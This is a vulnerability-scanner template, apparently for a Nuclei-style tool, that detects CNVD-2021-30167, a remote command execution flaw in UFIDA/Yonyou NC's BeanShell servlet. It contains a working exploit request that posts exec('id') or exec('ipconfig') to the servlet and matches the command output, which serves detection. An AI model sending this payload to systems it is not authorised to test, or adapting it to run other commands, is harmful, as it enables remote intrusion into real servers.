## id: CNVD-2021-30167
## name: UFIDA NC BeanShell Remote Command Execution
## author: hack007x
## severity: critical
## tags: cnvd2021,cnvd,beanshell,rce,yonyou,vuln
## description: UFIDA NC BeanShell contains a remote command execution vulnerability in the bsh.servlet.BshServlet program.
## cvss-score: 10
## reference: https://mp.weixin.qq.com/s/FvqC1I_G14AEQNztU0zn8A
## reference: https://www.cnvd.org.cn/webinfo/show/6491
## reference: https://chowdera.com/2022/03/202203110138271510.html
## verification: true

#$ payload = bsh.script=exec("id"); | bsh.script=exec("ipconfig");

POST /servlet/~ic/bsh.servlet.BshServlet HTTP/1.1
Host: {{Hostname}}
User-Agent: {{random_ua}}
Content-Type: application/x-www-form-urlencoded

{{payload}}

#@ stop_scan: true
#@ condition: and
#@ matcher: body matches /uid=[0-9]+.*gid=[0-9]+.*/ 
#@ matcher: body contains "BeanShell Test Servlet" 
#@ matcher: status_code == 200





# @VEIL-STAMP: 3fcbbec1981ab0d7944f48f09c2431282544e99a212fbd885d3b81c3e36f4b22
